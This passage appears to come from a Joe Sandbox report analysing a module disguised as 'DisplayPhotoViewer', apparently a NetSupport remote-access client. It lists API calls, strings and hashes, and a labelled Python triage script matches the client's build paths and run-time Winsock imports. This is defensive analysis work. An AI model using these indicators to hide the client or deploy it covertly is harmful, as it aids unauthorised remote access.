• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
• String ID:
• API String ID: 1497311044-0
• Opcode ID: 3539aca70cc77286193dfc50594548d354fa47dc182412ca9ef8d2133265bd56
• Instruction ID: 1f7ec4641051313e9c244ae3aa0c3cec66dcab1a3eeb14b8810ca7964845f047
• Opcode Fuzzy Hash: 3539aca70cc77286193dfc50594548d354fa47dc182412ca9ef8d2133265bd56
• Instruction Fuzzy Hash: 4721F536B01614ABD711DFA8EC84B9EB7E9EB89765F1080E5FD08D7244D771AD008BE0
APIs
• GetProcAddress.KERNEL32(00000000,1118A8B8), ref: 1100D384
• GetProcAddress.KERNEL32(00000000,1118A8A8), ref: 1100D398
• GetProcAddress.KERNEL32(00000000,1118A898), ref: 1100D3AD
• GetProcAddress.KERNEL32(00000000,1118A888), ref: 1100D3C1
• GetProcAddress.KERNEL32(00000000,1118A87C), ref: 1100D3D5
• GetProcAddress.KERNEL32(00000000,1118A85C), ref: 1100D3EA
• GetProcAddress.KERNEL32(00000000,1118A83C), ref: 1100D3FE
• GetProcAddress.KERNEL32(00000000,1118A82C), ref: 1100D412
• GetProcAddress.KERNEL32(00000000,1118A81C), ref: 1100D427
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
• Opcode ID: 233903392df06338b3f2c8a4faf8cf208d1f2162a67ad1df7b6ea8cc37579ce2
• Instruction ID: d5706c1e78f67052f3109f641fb3da105fae7633845825e59f762560ef698efe
• Opcode Fuzzy Hash: 233903392df06338b3f2c8a4faf8cf208d1f2162a67ad1df7b6ea8cc37579ce2
• Instruction Fuzzy Hash: E731BFB6A226389FE742CBE4C4C4A79B7E8E3CC749F00827AE5218364CD7749441CFA0
                                                                                                    APIs
                                                                                                    • GetStockObject.GDI32(00000007), ref: 1110B517
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1110B526
                                                                                                    • SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,11112194,?,00000001,00000001,00000000,111169A7,00000000,?,00000000), ref: 1110B531
                                                                                                    • GetStockObject.GDI32(00000000), ref: 1110B539
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 1110B542
                                                                                                    • GetStockObject.GDI32(0000000D), ref: 1110B546
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1110B54F
                                                                                                    • SelectClipRgn.GDI32(00000000,00000000), ref: 1110B563
                                                                                                    • SelectClipRgn.GDI32(?,?), ref: 1110B585
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Object$Select$Stock$Clip$Brush
• String ID:
• API String ID: 2690518013-0
• Opcode ID: 0e28264b6466a9b73ce7f8e67dfb6895454015b4cd75f8d18bc32c6caf2bcd23
• Instruction ID: dcc9ad77b0e3d9334746c1aa21f63614a8ac350f048a1af3a655f16de992b504
• Opcode Fuzzy Hash: 0e28264b6466a9b73ce7f8e67dfb6895454015b4cd75f8d18bc32c6caf2bcd23
• Instruction Fuzzy Hash: A5113A71600604AFE720EFA9CC84F2AF7E8BF48714F254829E59897280C774E840CFA4
APIs
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 1113D056
• GetCurrentThread.KERNEL32 ref: 1113D059
• GetCurrentProcess.KERNEL32(00000000), ref: 1113D060
• DuplicateHandle.KERNEL32(00000000), ref: 1113D063
• CreateThread.KERNEL32(00000000,00001000,1113CFD0,?,00000000,?), ref: 1113D083
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1113D08E
• GetExitCodeThread.KERNEL32(00000000,00000000), ref: 1113D099
• CloseHandle.KERNEL32(00000000), ref: 1113D0A6
• CloseHandle.KERNEL32(?), ref: 1113D0AC
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CurrentHandleThread$CloseProcess$CodeCreateDuplicateExitObjectSingleWait
• String ID:
• API String ID: 4048439911-0
• Opcode ID: eea4247776c04defb3709bf7d350b193a04939d91f5354f80ce9231d2e2a0acf
• Instruction ID: 8789abf273926b7e99cca029b3e208802ecef246308cfdcc9559dfce037f3cc0
• Opcode Fuzzy Hash: eea4247776c04defb3709bf7d350b193a04939d91f5354f80ce9231d2e2a0acf
• Instruction Fuzzy Hash: B0110D71D10228ABDB10DFA8DC49BEEBBBCEB08754F008159F914A7288D6B45A018BA1
APIs
• IsWindow.USER32(?), ref: 11045821
• _malloc.LIBCMT ref: 110458BD
• _memmove.LIBCMT ref: 11045922
• SendMessageTimeoutA.USER32(?,0000004A,0006029E,00000005,00000002,00002710,?), ref: 11045982
• _free.LIBCMT ref: 11045989
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
  • Part of subcall function 110422F0: _free.LIBCMT ref: 11042377
  • Part of subcall function 110422F0: _free.LIBCMT ref: 11042397
  • Part of subcall function 110422F0: _strncpy.LIBCMT ref: 110423C5
  • Part of subcall function 110422F0: _strncpy.LIBCMT ref: 11042402
  • Part of subcall function 110422F0: _malloc.LIBCMT ref: 1104243C
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
• String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h
• API String ID: 3960737985-2967710367
• Opcode ID: bcd3daf033d967f1d9cca255c6b83aa001d663cae78bb101683a05f94304e5d5
• Instruction ID: 5919227509b6c1cd0f5a8cfa33dc3f062349fd2b33b5d0098d04dad6020396e0
• Opcode Fuzzy Hash: bcd3daf033d967f1d9cca255c6b83aa001d663cae78bb101683a05f94304e5d5
• Instruction Fuzzy Hash: 29C19374E0060A9FDB04DFA4C8D0EEEF7B5BF89304F208168D51A9B694EB71A945CB91
APIs
• _malloc.LIBCMT ref: 1103B863
• _memset.LIBCMT ref: 1103B871
• _memmove.LIBCMT ref: 1103B87E
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
  • Part of subcall function 1103B550: Sleep.KERNEL32(000001F4,00000000,?,00000000,-111E103C), ref: 1103B581
  • Part of subcall function 11027F50: _strrchr.LIBCMT ref: 11028045
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028084
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: ExitProcess$ErrorLastMessageSleep_malloc_memmove_memset_strrchrwsprintf
• String ID: IsA()$PF%sinclude:*exclude:$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$redirect:
• API String ID: 3725223747-631189234
• Opcode ID: 19d8a4e5d375a7eb185e244eb380631696b46d248f4f5312f5c3c1ef66cc61ff
• Instruction ID: 4f1d40467b6062d492038a749f24983a4c634af8c509c60cb4a0960e8162d997
• Opcode Fuzzy Hash: 19d8a4e5d375a7eb185e244eb380631696b46d248f4f5312f5c3c1ef66cc61ff
• Instruction Fuzzy Hash: B4B1C339E00A579FDB05DF94CCA0FEEF7B1BF85219F408154E925A7385EA30A9058B91
APIs
• _malloc.LIBCMT ref: 1114D056
  • Part of subcall function 111583B1: __FF_MSGBANNER.LIBCMT ref: 111583CA
  • Part of subcall function 111583B1: __NMSG_WRITE.LIBCMT ref: 111583D1
  • Part of subcall function 111583B1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 111583F6
• _memset.LIBCMT ref: 1114D06F
• GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 1114D0CF
• _malloc.LIBCMT ref: 1114D0F7
• _free.LIBCMT ref: 1114D1D3
• _free.LIBCMT ref: 1114D1DF
  • Part of subcall function 110E6E70: _memmove.LIBCMT ref: 110E6F8F
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: _free_malloc$AllocateBitsHeap_memmove_memset
• String ID: (
• API String ID: 3140430649-3887548279
• Opcode ID: 6e4e08085dd2f3194cdba96a60389649f18772a3e6ef9c066b46f128c6eb636b
• Instruction ID: 9b10451811fea9ba676d3732e3f1d1642c315e07d3ea4e89a1ea02e94ee7f4fa
• Opcode Fuzzy Hash: 6e4e08085dd2f3194cdba96a60389649f18772a3e6ef9c066b46f128c6eb636b
• Instruction Fuzzy Hash: 6D5171B5A012149FDB50DF18CC80B9EB7B5EF88708F9541A9EA08DB341DB30EA40CF69
APIs
• SetTimer.USER32(00000000,00000000,?,Function_000B2600), ref: 11085266
• MessageBoxIndirectA.USER32(00000028), ref: 11085272
• KillTimer.USER32(00000000,00000000), ref: 1108527D
• PeekMessageA.USER32(?,00000000,00000012,00000012,00000001), ref: 1108528F
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: MessageTimer$IndirectKillPeek
• String ID: ($EH NOFAIL msg=%s
• API String ID: 191993809-813564207
• Opcode ID: de97985ff81b10a1741cdde529b311bb6ef5a03e632dcd8e32c65a56bd58dd45
• Instruction ID: 8cb5c284af9faec743a345b9402f5b48b7a0b965cf4017f68c7df73f46ef3b36
• Opcode Fuzzy Hash: de97985ff81b10a1741cdde529b311bb6ef5a03e632dcd8e32c65a56bd58dd45
• Instruction Fuzzy Hash: CD416071E142099FDB50DFA9E885BDEBBF4EF88315F10406AF918E7244EB719941CBA0
                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 110C781B
                                                                                                    • GetWindowRect.USER32(?,?), ref: 110C7829
                                                                                                    • MapWindowPoints.USER32(00000000,?,00000018,00000002), ref: 110C7864
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$ErrorExitLastMessagePointsProcesswsprintf
                                                                                                    • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$hWnd$m_hWnd
                                                                                                    • API String ID: 976951863-995508580
                                                                                                    • Opcode ID: 928e3a65d07facfeacd891c660517119ae17fa036a0a6f4f1a30a60ae5241aad
                                                                                                    • Instruction ID: 59a47bbbc285fc246557415b63f305e486d2a63fbf9a7c98b17aba2b85de9725
                                                                                                    • Opcode Fuzzy Hash: 928e3a65d07facfeacd891c660517119ae17fa036a0a6f4f1a30a60ae5241aad
                                                                                                    • Instruction Fuzzy Hash: 8F413B75E0060AAFCB04CF69D884EAAFBB4BF88704B00C599E9199B755D730E915CFA1
                                                                                                    APIs
                                                                                                      • Part of subcall function 11122C00: LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 11122C36
                                                                                                      • Part of subcall function 11122C00: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 11122C53
                                                                                                      • Part of subcall function 11122C00: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 11122C5D
                                                                                                      • Part of subcall function 11122C00: GetProcAddress.KERNEL32(00000000,socket), ref: 11122C6B
                                                                                                      • Part of subcall function 11122C00: GetProcAddress.KERNEL32(00000000,closesocket), ref: 11122C79
                                                                                                      • Part of subcall function 11122C00: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 11122C87
                                                                                                      • Part of subcall function 11122C00: FreeLibrary.KERNEL32(00000000), ref: 11122CFC
                                                                                                    • LoadLibraryA.KERNEL32(ws2_32.dll,?,?,00000000), ref: 1112351A
                                                                                                    • GetProcAddress.KERNEL32(00000000,ntohl), ref: 11123532
                                                                                                    • _calloc.LIBCMT ref: 1112353D
                                                                                                    • _free.LIBCMT ref: 111235DB
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 111235F2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad$_calloc_free
                                                                                                    • String ID: ntohl$ws2_32.dll
                                                                                                    • API String ID: 2881363997-4165132517
                                                                                                    • Opcode ID: 9cf601c31173e881da82343d764f31f41489007e2fb6e39136d3408191708be2
                                                                                                    • Instruction ID: dd055e59ea46509df880882031a7980c0bf75708d40e00152f2d6e66d058c424
                                                                                                    • Opcode Fuzzy Hash: 9cf601c31173e881da82343d764f31f41489007e2fb6e39136d3408191708be2
                                                                                                    • Instruction Fuzzy Hash: F1316075E142299BC791DF548D80799F7F8FF48714F6181A9E888A7304DF30AA858FD1
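                                                                                                    The entry above shows the client resolving Winsock at run time (LoadLibraryA of ws2_32.dll, then GetProcAddress for WSAStartup, WSACleanup, socket, closesocket, WSAIoctl and ntohl, then FreeLibrary), so the static import table of the dropped module does not reveal its network capability; the strings do. The script below is an added example, not Joe Sandbox or NetSupport code: it runs a strings-style scan over a raw memory region and reports whether those run-time-resolved Winsock names occur together with the e:\nsmsrc\... build paths and the Client32 message-box title listed in these entries. The dump bytes it scans are constructed inline so it runs offline; the function names and the "at least three Winsock names" threshold are this example's own choices, not anything the report defines.

```python
"""Triage helper for the indicators listed in the report entries above.

Added example, not Joe Sandbox or NetSupport code. Scans a raw memory
region (e.g. the bytes of an .sdmp file) for two groups of evidence:
the NetSupport build paths / assertion strings, and the Winsock names
that the client resolves with LoadLibraryA + GetProcAddress at run time.
The sample dump bytes at the bottom are constructed, not real dump data.
"""
import re
from typing import Dict, List

# Source paths and assertion-site strings shown in the 0x11000000 module.
NETSUPPORT_SOURCE_PATHS = [
    rb"e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h",
    rb"e:\nsmsrc\nsm\1201\1201f2\ctl32\nsmdlg.h",
    rb"e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h",
    rb"..\ctl32\nsmdlg.cpp",
    rb"..\CTL32\NSMString.cpp",
]

# Names the report shows being passed to LoadLibraryA / GetProcAddress.
# They are NUL-terminated literals in the binary, so each is its own run.
WINSOCK_DYNAMIC_IMPORTS = [
    b"ws2_32.dll", b"WSAStartup", b"WSACleanup", b"socket",
    b"closesocket", b"WSAIoctl", b"ntohl",
]

# Title of the fatal-error MessageBoxA that precedes ExitProcess.
MESSAGEBOX_TITLE = b"Client32"

# Printable-ASCII runs of at least 5 bytes, like `strings -n 5`.
_ASCII_RUN = re.compile(rb"[\x20-\x7e]{5,}")


def extract_ascii_strings(buf: bytes) -> List[bytes]:
    """Return every printable-ASCII run of at least 5 characters in buf."""
    return _ASCII_RUN.findall(buf)


def classify_dump(buf: bytes) -> Dict[str, object]:
    """Report which indicator groups are present in the given bytes.

    Paths are matched as substrings (they may sit inside a longer assertion
    message); Winsock names must match a whole run, so "socket" does not
    fire on "closesocket".
    """
    runs = extract_ascii_strings(buf)
    run_set = set(runs)
    paths = sorted(p.decode() for p in NETSUPPORT_SOURCE_PATHS
                   if any(p in r for r in runs))
    winsock = sorted(n.decode() for n in WINSOCK_DYNAMIC_IMPORTS
                     if n in run_set)
    result: Dict[str, object] = {
        "source_paths": paths,
        "winsock_dynamic_imports": winsock,
        "client32_messagebox": any(MESSAGEBOX_TITLE in r for r in runs),
    }
    # Example's own threshold: build paths plus several run-time-resolved
    # Winsock names together are what distinguishes this client module.
    result["netsupport_client_like"] = bool(paths) and len(winsock) >= 3
    return result


def build_sample_dump() -> bytes:
    """Constructed stand-in for a dump region carrying the report's strings."""
    parts = [
        b"\x00" * 16,
        b"ws2_32.dll\x00", b"WSAStartup\x00", b"WSACleanup\x00", b"socket\x00",
        b"closesocket\x00", b"WSAIoctl\x00", b"ntohl\x00",
        b"\x90\x90\xcc\xcc" * 8,                      # non-printable filler
        rb"e:\nsmsrc\nsm\1201\1201f2\ctl32\nsmdlg.h" + b"\x00",
        b"m_hWnd\x00",
        b"Client32\x00",
        b"Warning. simap lock held for %d ms\x00",
    ]
    return b"".join(parts)


def build_benign_dump() -> bytes:
    """Constructed control: CRT strings only, no build paths, no Winsock names."""
    return (b"\x00" * 8
            + b"Microsoft Visual C++ Runtime Library\x00"
            + b"kernel32.dll\x00")


if __name__ == "__main__":
    for name, dump in (("sample", build_sample_dump()),
                       ("benign", build_benign_dump())):
        print(name, classify_dump(dump))
```

Run it against a real region by replacing build_sample_dump() with the bytes of the .sdmp file; the whole-run match for Winsock names is deliberate, since a substring match would let "socket" fire on "closesocket" and on unrelated modules.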
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F2FD
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F320
                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 1100F3A4
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1100F3B2
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F3C5
                                                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F3DF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                    • String ID: bad cast
                                                                                                    • API String ID: 2427920155-3145022300
                                                                                                    • Opcode ID: 8bf9cb6a006ec96d7f0899834dca8d91d7ec2d1a6e0afd45d62e70498fc3bf3d
                                                                                                    • Instruction ID: 0dc3eda6241a0dbddb48c452862a868cd14ce2ef7e660d9faf1b2705b6f5d502
                                                                                                    • Opcode Fuzzy Hash: 8bf9cb6a006ec96d7f0899834dca8d91d7ec2d1a6e0afd45d62e70498fc3bf3d
                                                                                                    • Instruction Fuzzy Hash: EC31B175D042269BDB55DF94C880BAEF7B4EB05378F10826DD832A7680DB30BE40CB92
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 10709B10
                                                                                                    • GetStdHandle.KERNEL32(000000F4,10710518,00000000,?,00000000,?), ref: 10709BE6
                                                                                                    • WriteFile.KERNEL32(00000000), ref: 10709BED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$HandleModuleNameWrite
                                                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                    • API String ID: 3784150691-4022980321
                                                                                                    • Opcode ID: 8a177b86c9c12458968d0aaddaf78867e311fc7eefc336ff7107c80ba94edd50
                                                                                                    • Instruction ID: 6976064b5a27e4ea24572c67b07b4eb5d400cde5ba2d78dfb3fbb54c2e0be66b
                                                                                                    • Opcode Fuzzy Hash: 8a177b86c9c12458968d0aaddaf78867e311fc7eefc336ff7107c80ba94edd50
                                                                                                    • Instruction Fuzzy Hash: 233196B2A0021DEEDB11DB60DC89FDA73EDEB46350F140756F585D60C4EA70EA94CA91
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD811
                                                                                                    • EnterCriticalSection.KERNEL32 ref: 110FD828
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD82E
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD8CB
                                                                                                    • LeaveCriticalSection.KERNEL32(111E41A4), ref: 110FD8D8
                                                                                                    Strings
                                                                                                    • Warning. simap lock held for %d ms, xrefs: 110FD8E9
                                                                                                    • Warning. took %d ms to get simap lock, xrefs: 110FD83F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
